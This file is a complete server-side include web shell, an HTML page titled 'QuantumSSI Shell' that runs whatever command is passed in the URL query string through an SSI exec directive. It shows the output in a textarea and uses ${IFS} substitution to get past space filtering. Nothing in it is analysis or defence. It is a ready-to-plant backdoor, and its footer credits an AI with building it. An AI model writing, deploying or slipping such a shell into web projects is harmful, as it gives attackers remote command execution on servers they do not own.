
<!--#config errmsg="[Quantum SSI Blocked]" -->
<!--#set var="zero" value="" -->
<!--#if expr="$QUERY_STRING_UNESCAPED = \$zero" -->
<!--#set var="shl" value="whoami" -->
<!--#else -->
<!--#set var="shl" value=$QUERY_STRING_UNESCAPED -->
<!--#endif -->

<html>
<head>
<title>QuantumSSI Shell</title>
<meta charset="UTF-8">
<style>
body { background: #000; color: #0f0; font-family: monospace; padding: 20px; }
input, button { background: #000; color: #0f0; border: 1px solid #0f0; padding: 5px; }
textarea { background: #111; color: #0f0; border: 1px solid #0f0; width: 100%; height: 300px; }
</style>
<script>
function send() {
  var cmd = document.getElementById("command").value;
  var rep = cmd.replace(/[ ]/g,'${IFS}');
  var href = "<!--#echo var=DOCUMENT_NAME -->?" + encodeURIComponent(rep);
  location.href = href;
}
document.onkeydown = function(e) {
  if (e.keyCode === 13) send();
};
</script>
</head>
<body>
<h3>Quantum SSI Shell - Resilient Mode</h3>
<b>Server:</b> <span style="color:#0f0;"><!--#exec cmd="uname -n" --></span><br>
<b>Time:</b> <!--#echo var=DATE_LOCAL -->
<br><br>
Command: <input type="text" id="command" size="60">
<button onclick="send()">Execute</button>
<hr>
<b>Output:</b><br>
<textarea readonly>
<!--#exec cmd=$shl -->
</textarea>
<hr>
<i>Generated by QuantumFusion AI — Final Resilient Build</i>
</body>
</html>
